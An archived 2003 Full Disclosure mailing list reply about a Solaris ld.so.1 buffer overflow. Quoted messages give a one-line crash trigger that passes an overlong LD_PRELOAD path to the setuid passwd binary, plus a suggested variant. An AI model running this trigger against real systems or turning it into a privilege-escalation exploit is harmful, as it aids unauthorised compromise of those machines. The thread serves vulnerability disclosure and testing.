Full Disclosure mailing list archives

RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow

From: "Schmehl, Paul L" <pauls () utdallas edu>
Date: Thu, 31 Jul 2003 10:08:15 -0500

-----Original Message-----
From: Jim Dew [mailto:jdew () yggdrasil ca] 
Sent: Wednesday, July 30, 2003 8:19 PM
To: Jouko Pynnonen
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 
buffer overflow


On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:


On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:

Modify the command (you need to add a trailing slash) to be the 
following:

LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.


this segfaults on solaris 2.6

Try moving the escape to *before* the backtick:
LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Solaris ld.so.1 buffer overflow Jouko Pynnonen (Jul 29)
- <Possible follow-ups>
- Fwd: Re: Solaris ld.so.1 buffer overflow Jouko Pynnonen (Jul 30)
  - Alleged Foundstone anonymous astroturf memo Richard Johnson (Jul 30)
  - Re: Fwd: Re: Solaris ld.so.1 buffer overflow Jim Dew (Jul 30)
- RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow Schmehl, Paul L (Jul 31)